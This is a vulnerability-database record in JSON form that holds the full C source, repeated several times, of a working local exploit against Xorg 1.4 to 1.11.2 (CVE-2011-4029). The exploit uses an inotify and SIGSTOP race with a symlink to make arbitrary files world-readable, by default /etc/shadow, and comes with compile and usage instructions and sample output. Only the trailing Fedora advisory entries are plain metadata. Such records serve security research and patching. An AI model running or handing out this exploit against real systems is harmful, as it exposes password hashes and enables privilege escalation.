\\n\");\n if (!get_tty_number())\n printf(\"Try with console ownership: switch to a TTY by using \"\n\t \"Ctrl-Alt-F[1-6] and try again.\\n\");\n else\n printf(\"Maybe inotify isn't enabled.\\n\");\n\n _exit(1);\n}\n\n\nint launch_xorg_instance(int inc) {\n int pid, newfd;\n char *opt[] = { XORG_BIN, DISPLAY, NULL };\n\n if ((pid = fork()) == 0) {\n newfd = open(\"/dev/tty\", O_RDONLY);\n dup2(newfd, 0); close(1); close(2); \n\n nice(inc); usleep(30000);\n execve(XORG_BIN, opt, NULL);\n _exit(0);\n }\n\n return pid;\n}\n\n\nvoid show_target_file(char *file) {\n char cmd[128];\n\n memset(cmd, '\\0', sizeof(cmd));\n sprintf(cmd, \"/bin/ls -l %s\", file);\n system(cmd);\n}\n\n\nint main(int argc, char **argv) {\n pid_t pid, remove_pid;\n struct stat st;\n int fd, wd, status;\n char targetfile[128], lockfiletmp[20], lockfile[20];\n\n if (argc < 2)\n strcpy(targetfile, \"/etc/shadow\");\n else\n strcpy(targetfile, argv[1]);\n\n sprintf(lockfile, \"/tmp/.X%s-lock\", DISPLAY + 1);\n sprintf(lockfiletmp, \"/tmp/.tX%s-lock\", DISPLAY + 1);\n\n if (stat(lockfile, &st) == 0) {\n printf(\"[-] %s exists, maybe Xorg is already running on this\"\n\t \" display? Choose another display by editing the DISPLAY\"\n\t \" attributes.\\n\", lockfile);\n return 1;\n }\n\n umask(077);\n signal(SIGALRM, timeout_handler);\n\n symlink(\"/dontexist\", lockfile);\n\n fd = inotify_init();\n wd = inotify_add_watch(fd, \"/tmp\", IN_CREATE);\n\n alarm(5);\n printf(\"[+] Trying to stop a Xorg process right before chmod()\\n\");\n pid = launch_xorg_instance(19);\n syscall(SYS_read, fd, 0, 0);\n syscall(SYS_kill, pid, SIGSTOP);\n alarm(0);\n\n printf(\"[+] Process ID %d stopped (SIGSTOP sent)\\n\", pid);\n\n inotify_rm_watch(fd, wd);\n\n stat(lockfiletmp, &st);\n if ((st.st_mode & 4) != 0) {\n printf(\"[-] %s file has wrong rights (%o) removing it by launching\"\n\t \" another Xorg process\\n[-] Attack failed. 
Try again!\\n\",\n\t lockfiletmp, st.st_mode);\n\n remove_pid = launch_xorg_instance(0);\n waitpid(remove_pid, &status, 0);\n unlink(lockfile);\n return 1;\n }\n\n printf(\"[+] Removing %s by launching another Xorg process\\n\",\n\t lockfiletmp);\n remove_pid = launch_xorg_instance(0);\n waitpid(remove_pid, &status, 0);\n\n printf(\"[+] Creating evil symlink (%s -> %s)\\n\", lockfiletmp,\n\t targetfile);\n symlink(targetfile, lockfiletmp);\n\n printf(\"[+] Process ID %d resumed (SIGCONT sent)\\n\", pid);\n kill(pid, SIGCONT);\n waitpid(pid, &status, 0);\n\n unlink(lockfile);\n\n stat(targetfile, &st);\n if (!(st.st_mode & 004)) {\n printf(\"[-] Attack failed, rights are %o. Try again!\\n\", st.st_mode);\n return 1;\n }\n\n printf(\"[+] Attack succeeded, ls -l %s:\\n\", targetfile);\n show_target_file(targetfile);\n\n return 0;\n}", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}], "seebug": [{"lastseen": "2017-11-19T14:37:15", "description": "No description provided by source.", "published": "2014-07-01T00:00:00", "title": "Xorg 1.4 to 1.11.2 File Permission Change PoC", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-4029", "CVE-2011-4613"], "modified": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-72273", "id": "SSV:72273", "sourceData": "\n /* xchmod.c -- Xorg file permission change vulnerability PoC\r\n\r\n Author: vladz (http://vladz.devzero.fr)\r\n Date: 2011/12/15\r\n Software: www.x.org\r\n Version: Xorg 1.4 to 1.11.2 in all configurations. 
Xorg 1.3 and\r\n earlier if built with the USE_CHMOD preprocessor identifier\r\n Tested on: Debian 6.0.2 up to date with X default configuration issued\r\n from the xserver-xorg-core package (version 2:1.7.7-13)\r\n CVEs: CVE-2011-4029 & CVE-2011-4613\r\n\r\n This PoC exploits CVE-2011-4029 to set the rights 444 (read for all) on\r\n arbitrary file specified as argument (default file is \"/etc/shadow\").\r\n It uses SIGSTOP/SIGCONT signals and the Inotify API to win the race.\r\n Made for EDUCATIONAL PURPOSES ONLY!\r\n\r\n On some configurations, this exploit must be launched from a TTY (switch\r\n by typing Ctrl-Alt-Fn). But not on Debian, because it bypasses the X\r\n wrapper permission thanks to CVE-2011-4613!\r\n\r\n Tested on Debian 6.0.3 up to date with X default configuration issued\r\n from the xserver-xorg-core package (version 2:1.7.7-13).\r\n\r\n Compile: cc xchmod.c -o xchmod\r\n Usage: ./xchmod [/path/to/file] (default file is /etc/shadow)\r\n\r\n $ ls -l /etc/shadow\r\n -rw-r----- 1 root shadow 1072 Aug 7 07:10 /etc/shadow\r\n $ ./xchmod\r\n [+] Trying to stop a Xorg process right before chmod()\r\n [+] Process ID 4134 stopped (SIGSTOP sent)\r\n [+] Removing /tmp/.tX1-lock by launching another Xorg process\r\n [+] Creating evil symlink (/tmp/.tX1-lock -> /etc/shadow)\r\n [+] Process ID 4134 resumed (SIGCONT sent)\r\n [+] Attack succeeded, ls -l /etc/shadow:\r\n -r--r--r-- 1 root shadow 1072 Aug 7 07:10 /etc/shadow\r\n\r\n -----------------------------------------------------------------------\r\n\r\n \"THE BEER-WARE LICENSE\" (Revision 42):\r\n <vladz@devzero.fr> wrote this file. As long as you retain this notice\r\n you can do whatever you want with this stuff. If we meet some day, and\r\n you think this stuff is worth it, you can buy me a beer in return. 
-V.\r\n*/\r\n\r\n#include <fcntl.h>\r\n#include <unistd.h>\r\n#include <stdio.h>\r\n#include <syscall.h>\r\n#include <signal.h>\r\n#include <string.h>\r\n#include <stdlib.h>\r\n#include <sys/stat.h>\r\n#include <sys/inotify.h>\r\n#include <sys/types.h>\r\n#include <sys/wait.h>\r\n\r\n#define XORG_BIN \"/usr/bin/X\"\r\n#define DISPLAY \":1\"\r\n\r\n\r\nchar *get_tty_number(void) {\r\n char tty_name[128], *ptr;\r\n\r\n memset(tty_name, '\\0', sizeof(tty_name));\r\n readlink(\"/proc/self/fd/0\", tty_name, sizeof(tty_name));\r\n\r\n if ((ptr = strstr(tty_name, \"tty\")))\r\n return ptr + 3;\r\n\r\n return NULL;\r\n}\r\n\r\n\r\nvoid timeout_handler() {\r\n\r\n printf(\"[-] read() timeout! \\n\");\r\n if (!get_tty_number())\r\n printf(\"Try with console ownership: switch to a TTY by using \"\r\n\t \"Ctrl-Alt-F[1-6] and try again.\\n\");\r\n else\r\n printf(\"Maybe inotify isn't enabled.\\n\");\r\n\r\n _exit(1);\r\n}\r\n\r\n\r\nint launch_xorg_instance(int inc) {\r\n int pid, newfd;\r\n char *opt[] = { XORG_BIN, DISPLAY, NULL };\r\n\r\n if ((pid = fork()) == 0) {\r\n newfd = open(\"/dev/tty\", O_RDONLY);\r\n dup2(newfd, 0); close(1); close(2); \r\n\r\n nice(inc); usleep(30000);\r\n execve(XORG_BIN, opt, NULL);\r\n _exit(0);\r\n }\r\n\r\n return pid;\r\n}\r\n\r\n\r\nvoid show_target_file(char *file) {\r\n char cmd[128];\r\n\r\n memset(cmd, '\\0', sizeof(cmd));\r\n sprintf(cmd, \"/bin/ls -l %s\", file);\r\n system(cmd);\r\n}\r\n\r\n\r\nint main(int argc, char **argv) {\r\n pid_t pid, remove_pid;\r\n struct stat st;\r\n int fd, wd, status;\r\n char targetfile[128], lockfiletmp[20], lockfile[20];\r\n\r\n if (argc < 2)\r\n strcpy(targetfile, \"/etc/shadow\");\r\n else\r\n strcpy(targetfile, argv[1]);\r\n\r\n sprintf(lockfile, \"/tmp/.X%s-lock\", DISPLAY + 1);\r\n sprintf(lockfiletmp, \"/tmp/.tX%s-lock\", DISPLAY + 1);\r\n\r\n if (stat(lockfile, &st) == 0) {\r\n printf(\"[-] %s exists, maybe Xorg is already running on this\"\r\n\t \" display? 
Choose another display by editing the DISPLAY\"\r\n\t \" attributes.\\n\", lockfile);\r\n return 1;\r\n }\r\n\r\n umask(077);\r\n signal(SIGALRM, timeout_handler);\r\n\r\n symlink(\"/dontexist\", lockfile);\r\n\r\n fd = inotify_init();\r\n wd = inotify_add_watch(fd, \"/tmp\", IN_CREATE);\r\n\r\n alarm(5);\r\n printf(\"[+] Trying to stop a Xorg process right before chmod()\\n\");\r\n pid = launch_xorg_instance(19);\r\n syscall(SYS_read, fd, 0, 0);\r\n syscall(SYS_kill, pid, SIGSTOP);\r\n alarm(0);\r\n\r\n printf(\"[+] Process ID %d stopped (SIGSTOP sent)\\n\", pid);\r\n\r\n inotify_rm_watch(fd, wd);\r\n\r\n stat(lockfiletmp, &st);\r\n if ((st.st_mode & 4) != 0) {\r\n printf(\"[-] %s file has wrong rights (%o) removing it by launching\"\r\n\t \" another Xorg process\\n[-] Attack failed. Try again!\\n\",\r\n\t lockfiletmp, st.st_mode);\r\n\r\n remove_pid = launch_xorg_instance(0);\r\n waitpid(remove_pid, &status, 0);\r\n unlink(lockfile);\r\n return 1;\r\n }\r\n\r\n printf(\"[+] Removing %s by launching another Xorg process\\n\",\r\n\t lockfiletmp);\r\n remove_pid = launch_xorg_instance(0);\r\n waitpid(remove_pid, &status, 0);\r\n\r\n printf(\"[+] Creating evil symlink (%s -> %s)\\n\", lockfiletmp,\r\n\t targetfile);\r\n symlink(targetfile, lockfiletmp);\r\n\r\n printf(\"[+] Process ID %d resumed (SIGCONT sent)\\n\", pid);\r\n kill(pid, SIGCONT);\r\n waitpid(pid, &status, 0);\r\n\r\n unlink(lockfile);\r\n\r\n stat(targetfile, &st);\r\n if (!(st.st_mode & 004)) {\r\n printf(\"[-] Attack failed, rights are %o. Try again!\\n\", st.st_mode);\r\n return 1;\r\n }\r\n\r\n printf(\"[+] Attack succeeded, ls -l %s:\\n\", targetfile);\r\n show_target_file(targetfile);\r\n\r\n return 0;\r\n}\r\n\n ", "cvss": {"score": 4.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-72273"}], "exploitdb": [{"lastseen": "2016-02-02T09:03:57", "description": "Xorg 1.4 < 1.11.2 - File Permission Change PoC. CVE-2011-4029,CVE-2011-4613. 
Local exploit for linux platform", "published": "2011-10-28T00:00:00", "type": "exploitdb", "title": "Xorg 1.4 < 1.11.2 - File Permission Change PoC", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-4029", "CVE-2011-4613"], "modified": "2011-10-28T00:00:00", "id": "EDB-ID:18040", "href": "https://www.exploit-db.com/exploits/18040/", "sourceData": "/* xchmod.c -- Xorg file permission change vulnerability PoC\r\n\r\n Author: vladz (http://vladz.devzero.fr)\r\n Date: 2011/12/15\r\n Software: www.x.org\r\n Version: Xorg 1.4 to 1.11.2 in all configurations. Xorg 1.3 and\r\n earlier if built with the USE_CHMOD preprocessor identifier\r\n Tested on: Debian 6.0.2 up to date with X default configuration issued\r\n from the xserver-xorg-core package (version 2:1.7.7-13)\r\n CVEs: CVE-2011-4029 & CVE-2011-4613\r\n\r\n This PoC exploits CVE-2011-4029 to set the rights 444 (read for all) on\r\n arbitrary file specified as argument (default file is \"/etc/shadow\").\r\n It uses SIGSTOP/SIGCONT signals and the Inotify API to win the race.\r\n Made for EDUCATIONAL PURPOSES ONLY!\r\n\r\n On some configurations, this exploit must be launched from a TTY (switch\r\n by typing Ctrl-Alt-Fn). 
But not on Debian, because it bypasses the X\r\n wrapper permission thanks to CVE-2011-4613!\r\n\r\n Tested on Debian 6.0.3 up to date with X default configuration issued\r\n from the xserver-xorg-core package (version 2:1.7.7-13).\r\n\r\n Compile: cc xchmod.c -o xchmod\r\n Usage: ./xchmod [/path/to/file] (default file is /etc/shadow)\r\n\r\n $ ls -l /etc/shadow\r\n -rw-r----- 1 root shadow 1072 Aug 7 07:10 /etc/shadow\r\n $ ./xchmod\r\n [+] Trying to stop a Xorg process right before chmod()\r\n [+] Process ID 4134 stopped (SIGSTOP sent)\r\n [+] Removing /tmp/.tX1-lock by launching another Xorg process\r\n [+] Creating evil symlink (/tmp/.tX1-lock -> /etc/shadow)\r\n [+] Process ID 4134 resumed (SIGCONT sent)\r\n [+] Attack succeeded, ls -l /etc/shadow:\r\n -r--r--r-- 1 root shadow 1072 Aug 7 07:10 /etc/shadow\r\n\r\n -----------------------------------------------------------------------\r\n\r\n \"THE BEER-WARE LICENSE\" (Revision 42):\r\n <vladz@devzero.fr> wrote this file. As long as you retain this notice\r\n you can do whatever you want with this stuff. If we meet some day, and\r\n you think this stuff is worth it, you can buy me a beer in return. -V.\r\n*/\r\n\r\n#include <fcntl.h>\r\n#include <unistd.h>\r\n#include <stdio.h>\r\n#include <syscall.h>\r\n#include <signal.h>\r\n#include <string.h>\r\n#include <stdlib.h>\r\n#include <sys/stat.h>\r\n#include <sys/inotify.h>\r\n#include <sys/types.h>\r\n#include <sys/wait.h>\r\n\r\n#define XORG_BIN \"/usr/bin/X\"\r\n#define DISPLAY \":1\"\r\n\r\n\r\nchar *get_tty_number(void) {\r\n char tty_name[128], *ptr;\r\n\r\n memset(tty_name, '\\0', sizeof(tty_name));\r\n readlink(\"/proc/self/fd/0\", tty_name, sizeof(tty_name));\r\n\r\n if ((ptr = strstr(tty_name, \"tty\")))\r\n return ptr + 3;\r\n\r\n return NULL;\r\n}\r\n\r\n\r\nvoid timeout_handler() {\r\n\r\n printf(\"[-] read() timeout! 
\\n\");\r\n if (!get_tty_number())\r\n printf(\"Try with console ownership: switch to a TTY by using \"\r\n\t \"Ctrl-Alt-F[1-6] and try again.\\n\");\r\n else\r\n printf(\"Maybe inotify isn't enabled.\\n\");\r\n\r\n _exit(1);\r\n}\r\n\r\n\r\nint launch_xorg_instance(int inc) {\r\n int pid, newfd;\r\n char *opt[] = { XORG_BIN, DISPLAY, NULL };\r\n\r\n if ((pid = fork()) == 0) {\r\n newfd = open(\"/dev/tty\", O_RDONLY);\r\n dup2(newfd, 0); close(1); close(2); \r\n\r\n nice(inc); usleep(30000);\r\n execve(XORG_BIN, opt, NULL);\r\n _exit(0);\r\n }\r\n\r\n return pid;\r\n}\r\n\r\n\r\nvoid show_target_file(char *file) {\r\n char cmd[128];\r\n\r\n memset(cmd, '\\0', sizeof(cmd));\r\n sprintf(cmd, \"/bin/ls -l %s\", file);\r\n system(cmd);\r\n}\r\n\r\n\r\nint main(int argc, char **argv) {\r\n pid_t pid, remove_pid;\r\n struct stat st;\r\n int fd, wd, status;\r\n char targetfile[128], lockfiletmp[20], lockfile[20];\r\n\r\n if (argc < 2)\r\n strcpy(targetfile, \"/etc/shadow\");\r\n else\r\n strcpy(targetfile, argv[1]);\r\n\r\n sprintf(lockfile, \"/tmp/.X%s-lock\", DISPLAY + 1);\r\n sprintf(lockfiletmp, \"/tmp/.tX%s-lock\", DISPLAY + 1);\r\n\r\n if (stat(lockfile, &st) == 0) {\r\n printf(\"[-] %s exists, maybe Xorg is already running on this\"\r\n\t \" display? 
Choose another display by editing the DISPLAY\"\r\n\t \" attributes.\\n\", lockfile);\r\n return 1;\r\n }\r\n\r\n umask(077);\r\n signal(SIGALRM, timeout_handler);\r\n\r\n symlink(\"/dontexist\", lockfile);\r\n\r\n fd = inotify_init();\r\n wd = inotify_add_watch(fd, \"/tmp\", IN_CREATE);\r\n\r\n alarm(5);\r\n printf(\"[+] Trying to stop a Xorg process right before chmod()\\n\");\r\n pid = launch_xorg_instance(19);\r\n syscall(SYS_read, fd, 0, 0);\r\n syscall(SYS_kill, pid, SIGSTOP);\r\n alarm(0);\r\n\r\n printf(\"[+] Process ID %d stopped (SIGSTOP sent)\\n\", pid);\r\n\r\n inotify_rm_watch(fd, wd);\r\n\r\n stat(lockfiletmp, &st);\r\n if ((st.st_mode & 4) != 0) {\r\n printf(\"[-] %s file has wrong rights (%o) removing it by launching\"\r\n\t \" another Xorg process\\n[-] Attack failed. Try again!\\n\",\r\n\t lockfiletmp, st.st_mode);\r\n\r\n remove_pid = launch_xorg_instance(0);\r\n waitpid(remove_pid, &status, 0);\r\n unlink(lockfile);\r\n return 1;\r\n }\r\n\r\n printf(\"[+] Removing %s by launching another Xorg process\\n\",\r\n\t lockfiletmp);\r\n remove_pid = launch_xorg_instance(0);\r\n waitpid(remove_pid, &status, 0);\r\n\r\n printf(\"[+] Creating evil symlink (%s -> %s)\\n\", lockfiletmp,\r\n\t targetfile);\r\n symlink(targetfile, lockfiletmp);\r\n\r\n printf(\"[+] Process ID %d resumed (SIGCONT sent)\\n\", pid);\r\n kill(pid, SIGCONT);\r\n waitpid(pid, &status, 0);\r\n\r\n unlink(lockfile);\r\n\r\n stat(targetfile, &st);\r\n if (!(st.st_mode & 004)) {\r\n printf(\"[-] Attack failed, rights are %o. 
Try again!\\n\", st.st_mode);\r\n return 1;\r\n }\r\n\r\n printf(\"[+] Attack succeeded, ls -l %s:\\n\", targetfile);\r\n show_target_file(targetfile);\r\n\r\n return 0;\r\n}\r\n", "cvss": {"score": 4.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/18040/"}], "fedora": [{"lastseen": "2020-12-21T08:17:52", "bulletinFamily": "unix", "cvelist": ["CVE-2011-2895", "CVE-2011-4028", "CVE-2013-4396", "CVE-2013-6462", "CVE-2014-0209", "CVE-2014-0210", "CVE-2014-0211", "CVE-2014-8092", "CVE-2014-8093", "CVE-2014-8095", "CVE-2014-8096", "CVE-2014-8097", "CVE-2014-8098", "CVE-2014-8099", "CVE-2014-8100", "CVE-2014-8101", "CVE-2014-8102", "CVE-2015-0255"], "description": "NX is a software suite which implements very efficient compression of the X11 protocol. This increases performance when using X applications over a network, especially a slow one. This package provides the core nx-X11 libraries customized for nxagent/x2goagent. ", "modified": "2015-03-26T21:29:40", "published": "2015-03-26T21:29:40", "id": "FEDORA:A5A9D608A4BC", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 20 Update: nx-libs-3.5.0.29-1.fc20", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:52", "bulletinFamily": "unix", "cvelist": ["CVE-2011-2895", "CVE-2011-4028", "CVE-2013-4396", "CVE-2013-6462", "CVE-2014-0209", "CVE-2014-0210", "CVE-2014-0211", "CVE-2014-8092", "CVE-2014-8093", "CVE-2014-8095", "CVE-2014-8096", "CVE-2014-8097", "CVE-2014-8098", "CVE-2014-8099", "CVE-2014-8100", "CVE-2014-8101", "CVE-2014-8102", "CVE-2015-0255"], "description": "NX is a software suite which implements very efficient compression of the X11 protocol. This increases performance when using X applications over a network, especially a slow one. This package provides the core nx-X11 libraries customized for nxagent/x2goagent. 
", "modified": "2015-03-21T04:53:26", "published": "2015-03-21T04:53:26", "id": "FEDORA:593706093B2E", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 22 Update: nx-libs-3.5.0.29-1.fc22", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:52", "bulletinFamily": "unix", "cvelist": ["CVE-2011-2895", "CVE-2011-4028", "CVE-2013-4396", "CVE-2013-6462", "CVE-2014-0209", "CVE-2014-0210", "CVE-2014-0211", "CVE-2014-8092", "CVE-2014-8093", "CVE-2014-8095", "CVE-2014-8096", "CVE-2014-8097", "CVE-2014-8098", "CVE-2014-8099", "CVE-2014-8100", "CVE-2014-8101", "CVE-2014-8102", "CVE-2015-0255"], "description": "NX is a software suite which implements very efficient compression of the X11 protocol. This increases performance when using X applications over a network, especially a slow one. This package provides the core nx-X11 libraries customized for nxagent/x2goagent. ", "modified": "2015-03-26T21:51:39", "published": "2015-03-26T21:51:39", "id": "FEDORA:A13DB60C7030", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 21 Update: nx-libs-3.5.0.29-1.fc21", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}]}